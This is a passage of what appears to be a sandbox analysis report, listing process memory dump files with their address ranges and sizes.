                                                                                          • memory/740-182-0x00007FFCEF200000-0x00007FFCEF20F000-memory.dmp

                                                                                            Filesize

                                                                                            60KB

                                                                                          • memory/740-152-0x00007FFCD8930000-0x00007FFCD8F1E000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/740-204-0x00007FFCD8230000-0x00007FFCD8263000-memory.dmp

                                                                                            Filesize

                                                                                            204KB

                                                                                          • memory/740-198-0x00007FFCD8410000-0x00007FFCD8433000-memory.dmp

                                                                                            Filesize

                                                                                            140KB

                                                                                          • memory/740-199-0x00007FFCD8290000-0x00007FFCD8406000-memory.dmp

                                                                                            Filesize

                                                                                            1.5MB

                                                                                          • memory/740-617-0x00007FFCD8930000-0x00007FFCD8F1E000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/740-202-0x00007FFCE9D40000-0x00007FFCE9D4D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/740-402-0x00007FFCD8930000-0x00007FFCD8F1E000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/740-200-0x00007FFCD8270000-0x00007FFCD8289000-memory.dmp

                                                                                            Filesize

                                                                                            100KB

                                                                                          • memory/740-205-0x00007FFCD7C30000-0x00007FFCD7CFD000-memory.dmp

                                                                                            Filesize

                                                                                            820KB

                                                                                          • memory/740-206-0x00007FFCD8930000-0x00007FFCD8F1E000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/740-210-0x00007FFCD7C10000-0x00007FFCD7C24000-memory.dmp

                                                                                            Filesize

                                                                                            80KB

                                                                                          • memory/740-211-0x00007FFCE9B40000-0x00007FFCE9B4D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/740-623-0x00007FFCD8290000-0x00007FFCD8406000-memory.dmp

                                                                                            Filesize

                                                                                            1.5MB

                                                                                          • memory/740-320-0x00007FFCD7D00000-0x00007FFCD8222000-memory.dmp

                                                                                            Filesize

                                                                                            5.1MB

                                                                                          • memory/740-212-0x00007FFCD7AF0000-0x00007FFCD7C0C000-memory.dmp

                                                                                            Filesize

                                                                                            1.1MB

                                                                                          • memory/740-319-0x00007FFCD8270000-0x00007FFCD8289000-memory.dmp

                                                                                            Filesize

                                                                                            100KB

                                                                                          • memory/740-183-0x00007FFCD8490000-0x00007FFCD84B4000-memory.dmp

                                                                                            Filesize

                                                                                            144KB

                                                                                          • memory/740-330-0x00007FFCD7C30000-0x00007FFCD7CFD000-memory.dmp

                                                                                            Filesize

                                                                                            820KB

                                                                                          • memory/740-213-0x00007FFCD8490000-0x00007FFCD84B4000-memory.dmp

                                                                                            Filesize

                                                                                            144KB

                                                                                          • memory/740-252-0x00007FFCD8410000-0x00007FFCD8433000-memory.dmp

                                                                                            Filesize

                                                                                            140KB

                                                                                          • memory/1076-26-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1076-25-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1076-587-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1076-79-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1076-16-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1076-24-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1076-318-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1076-22-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1076-23-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1076-21-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1076-20-0x0000000000D70000-0x000000000109D000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/1392-379-0x00007FFCE8D80000-0x00007FFCE8D8D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/1392-375-0x00007FFCD35B0000-0x00007FFCD35C9000-memory.dmp

                                                                                            Filesize

                                                                                            100KB

                                                                                          • memory/1392-349-0x00007FFCD7500000-0x00007FFCD7AEE000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/1392-369-0x00007FFCE8D40000-0x00007FFCE8D4D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/1392-368-0x00007FFCD8620000-0x00007FFCD8634000-memory.dmp

                                                                                            Filesize

                                                                                            80KB

                                                                                          • memory/1392-385-0x00007FFCD1EA0000-0x00007FFCD2016000-memory.dmp

                                                                                            Filesize

                                                                                            1.5MB

                                                                                          • memory/1392-381-0x00007FFCCEE00000-0x00007FFCCF322000-memory.dmp

                                                                                            Filesize

                                                                                            5.1MB

                                                                                          • memory/1392-350-0x00007FFCD2440000-0x00007FFCD2473000-memory.dmp

                                                                                            Filesize

                                                                                            204KB

                                                                                          • memory/1392-344-0x00007FFCD3020000-0x00007FFCD3039000-memory.dmp

                                                                                            Filesize

                                                                                            100KB

                                                                                          • memory/1392-345-0x00007FFCE8D80000-0x00007FFCE8D8D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/1392-244-0x00007FFCD7500000-0x00007FFCD7AEE000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/1392-328-0x00007FFCD35D0000-0x00007FFCD35FD000-memory.dmp

                                                                                            Filesize

                                                                                            180KB

                                                                                          • memory/1392-380-0x00007FFCD2440000-0x00007FFCD2473000-memory.dmp

                                                                                            Filesize

                                                                                            204KB

                                                                                          • memory/1392-382-0x00007FFCD1DD0000-0x00007FFCD1E9D000-memory.dmp

                                                                                            Filesize

                                                                                            820KB

                                                                                          • memory/1392-347-0x00007FFCCEE00000-0x00007FFCCF322000-memory.dmp

                                                                                            Filesize

                                                                                            5.1MB

                                                                                          • memory/1392-376-0x00007FFCD3580000-0x00007FFCD35A3000-memory.dmp

                                                                                            Filesize

                                                                                            140KB

                                                                                          • memory/1392-348-0x00007FFCD1DD0000-0x00007FFCD1E9D000-memory.dmp

                                                                                            Filesize

                                                                                            820KB

                                                                                          • memory/1392-374-0x00007FFCD35D0000-0x00007FFCD35FD000-memory.dmp

                                                                                            Filesize

                                                                                            180KB

                                                                                          • memory/1392-373-0x00007FFCE9280000-0x00007FFCE928F000-memory.dmp

                                                                                            Filesize

                                                                                            60KB

                                                                                          • memory/1392-371-0x00007FFCD7500000-0x00007FFCD7AEE000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/1392-333-0x00007FFCD1EA0000-0x00007FFCD2016000-memory.dmp

                                                                                            Filesize

                                                                                            1.5MB

                                                                                          • memory/1392-378-0x00007FFCD3020000-0x00007FFCD3039000-memory.dmp

                                                                                            Filesize

                                                                                            100KB

                                                                                          • memory/1392-331-0x00007FFCD35B0000-0x00007FFCD35C9000-memory.dmp

                                                                                            Filesize

                                                                                            100KB

                                                                                          • memory/1392-372-0x00007FFCD7370000-0x00007FFCD7394000-memory.dmp

                                                                                            Filesize

                                                                                            144KB

                                                                                          • memory/1392-355-0x00007FFCD7370000-0x00007FFCD7394000-memory.dmp

                                                                                            Filesize

                                                                                            144KB

                                                                                          • memory/1392-250-0x00007FFCD7370000-0x00007FFCD7394000-memory.dmp

                                                                                            Filesize

                                                                                            144KB

                                                                                          • memory/1392-332-0x00007FFCD3580000-0x00007FFCD35A3000-memory.dmp

                                                                                            Filesize

                                                                                            140KB

                                                                                          • memory/1392-251-0x00007FFCE9280000-0x00007FFCE928F000-memory.dmp

                                                                                            Filesize

                                                                                            60KB

                                                                                          • memory/2424-209-0x00007FFCD84C0000-0x00007FFCD892A000-memory.dmp

                                                                                            Filesize

                                                                                            4.4MB

                                                                                          • memory/2424-181-0x00007FFCD84C0000-0x00007FFCD892A000-memory.dmp

                                                                                            Filesize

                                                                                            4.4MB

                                                                                          • memory/2924-59-0x00007FFCD91F0000-0x00007FFCD97DE000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/3120-475-0x0000000000C60000-0x00000000010DE000-memory.dmp

                                                                                            Filesize

                                                                                            4.5MB

                                                                                          • memory/3120-397-0x0000000000C60000-0x00000000010DE000-memory.dmp

                                                                                            Filesize

                                                                                            4.5MB

                                                                                          • memory/3120-253-0x0000000000C60000-0x00000000010DE000-memory.dmp

                                                                                            Filesize

                                                                                            4.5MB

                                                                                          • memory/3532-321-0x0000000008610000-0x0000000008C28000-memory.dmp

                                                                                            Filesize

                                                                                            6.1MB

                                                                                          • memory/3532-191-0x00000000073F0000-0x00000000073FA000-memory.dmp

                                                                                            Filesize

                                                                                            40KB

                                                                                          • memory/3532-180-0x0000000007350000-0x00000000073E2000-memory.dmp

                                                                                            Filesize

                                                                                            584KB

                                                                                          • memory/3532-151-0x00000000001D0000-0x0000000000966000-memory.dmp

                                                                                            Filesize

                                                                                            7.6MB

                                                                                          • memory/3532-468-0x0000000009710000-0x0000000009722000-memory.dmp

                                                                                            Filesize

                                                                                            72KB

                                                                                          • memory/3532-201-0x00000000001D0000-0x0000000000966000-memory.dmp

                                                                                            Filesize

                                                                                            7.6MB

                                                                                          • memory/3532-90-0x00000000001D0000-0x0000000000966000-memory.dmp

                                                                                            Filesize

                                                                                            7.6MB

                                                                                          • memory/3532-162-0x0000000007800000-0x0000000007DA4000-memory.dmp

                                                                                            Filesize

                                                                                            5.6MB

                                                                                          • memory/3532-470-0x0000000009820000-0x0000000009886000-memory.dmp

                                                                                            Filesize

                                                                                            408KB

                                                                                          • memory/3532-469-0x0000000009770000-0x00000000097AC000-memory.dmp

                                                                                            Filesize

                                                                                            240KB

                                                                                          • memory/3532-131-0x00000000001D0000-0x0000000000966000-memory.dmp

                                                                                            Filesize

                                                                                            7.6MB

                                                                                          • memory/3532-322-0x00000000081A0000-0x00000000081F0000-memory.dmp

                                                                                            Filesize

                                                                                            320KB

                                                                                          • memory/3532-334-0x0000000008410000-0x00000000084C2000-memory.dmp

                                                                                            Filesize

                                                                                            712KB

                                                                                          • memory/4292-308-0x000001EA42180000-0x000001EA421A2000-memory.dmp

                                                                                            Filesize

                                                                                            136KB

                                                                                          • memory/4468-0-0x0000000000FD0000-0x00000000012FD000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/4468-2-0x0000000000FD1000-0x0000000001039000-memory.dmp

                                                                                            Filesize

                                                                                            416KB

                                                                                          • memory/4468-18-0x0000000000FD0000-0x00000000012FD000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/4468-1-0x0000000077B34000-0x0000000077B36000-memory.dmp

                                                                                            Filesize

                                                                                            8KB

                                                                                          • memory/4468-19-0x0000000000FD1000-0x0000000001039000-memory.dmp

                                                                                            Filesize

                                                                                            416KB

                                                                                          • memory/4468-3-0x0000000000FD0000-0x00000000012FD000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/4468-4-0x0000000000FD0000-0x00000000012FD000-memory.dmp

                                                                                            Filesize

                                                                                            3.2MB

                                                                                          • memory/5204-463-0x00007FFCCE990000-0x00007FFCCEDFA000-memory.dmp

                                                                                            Filesize

                                                                                            4.4MB

                                                                                          • memory/5204-367-0x00007FFCCE990000-0x00007FFCCEDFA000-memory.dmp

                                                                                            Filesize

                                                                                            4.4MB

                                                                                          • memory/5508-459-0x00007FFCD8530000-0x00007FFCD8553000-memory.dmp

                                                                                            Filesize

                                                                                            140KB

                                                                                          • memory/5508-466-0x00007FFCD1A60000-0x00007FFCD1B2D000-memory.dmp

                                                                                            Filesize

                                                                                            820KB

                                                                                          • memory/5508-490-0x00007FFCD7500000-0x00007FFCD7AEE000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/5508-418-0x00007FFCE9280000-0x00007FFCE928F000-memory.dmp

                                                                                            Filesize

                                                                                            60KB

                                                                                          • memory/5508-464-0x00007FFCD8580000-0x00007FFCD85B3000-memory.dmp

                                                                                            Filesize

                                                                                            204KB

                                                                                          • memory/5508-417-0x00007FFCD85F0000-0x00007FFCD8614000-memory.dmp

                                                                                            Filesize

                                                                                            144KB

                                                                                          • memory/5508-396-0x00007FFCD7500000-0x00007FFCD7AEE000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/5508-467-0x00007FFCD7500000-0x00007FFCD7AEE000-memory.dmp

                                                                                            Filesize

                                                                                            5.9MB

                                                                                          • memory/5508-491-0x00007FFCD85F0000-0x00007FFCD8614000-memory.dmp

                                                                                            Filesize

                                                                                            144KB

                                                                                          • memory/5508-458-0x00007FFCD8560000-0x00007FFCD8579000-memory.dmp

                                                                                            Filesize

                                                                                            100KB

                                                                                          • memory/5508-492-0x00007FFCE9280000-0x00007FFCE928F000-memory.dmp

                                                                                            Filesize

                                                                                            60KB

                                                                                          • memory/5508-465-0x00007FFCCEE00000-0x00007FFCCF322000-memory.dmp

                                                                                            Filesize

                                                                                            5.1MB

                                                                                          • memory/5508-472-0x00007FFCD84C0000-0x00007FFCD84D4000-memory.dmp

                                                                                            Filesize

                                                                                            80KB

                                                                                          • memory/5508-489-0x00007FFCE8D40000-0x00007FFCE8D4D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/5508-486-0x00007FFCCEE00000-0x00007FFCCF322000-memory.dmp

                                                                                            Filesize

                                                                                            5.1MB

                                                                                          • memory/5508-487-0x00007FFCD1A60000-0x00007FFCD1B2D000-memory.dmp

                                                                                            Filesize

                                                                                            820KB

                                                                                          • memory/5508-488-0x00007FFCD84C0000-0x00007FFCD84D4000-memory.dmp

                                                                                            Filesize

                                                                                            80KB

                                                                                          • memory/5508-474-0x00007FFCE8D40000-0x00007FFCE8D4D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/5508-462-0x00007FFCE8D80000-0x00007FFCE8D8D000-memory.dmp

                                                                                            Filesize

                                                                                            52KB

                                                                                          • memory/5508-460-0x00007FFCD1D30000-0x00007FFCD1EA6000-memory.dmp

                                                                                            Filesize

                                                                                            1.5MB

                                                                                          • memory/5508-461-0x00007FFCD8510000-0x00007FFCD8529000-memory.dmp

                                                                                            Filesize

                                                                                            100KB

                                                                                          • memory/5508-457-0x00007FFCD85C0000-0x00007FFCD85ED000-memory.dmp

                                                                                            Filesize

                                                                                            180KB

                                                                                          • memory/5508-471-0x00007FFCD85F0000-0x00007FFCD8614000-memory.dmp

                                                                                            Filesize

                                                                                            144KB

                                                                                          • memory/6052-452-0x0000000000690000-0x0000000000D3E000-memory.dmp

                                                                                            Filesize

                                                                                            6.7MB

                                                                                          • memory/6052-473-0x0000000000690000-0x0000000000D3E000-memory.dmp

                                                                                            Filesize

                                                                                            6.7MB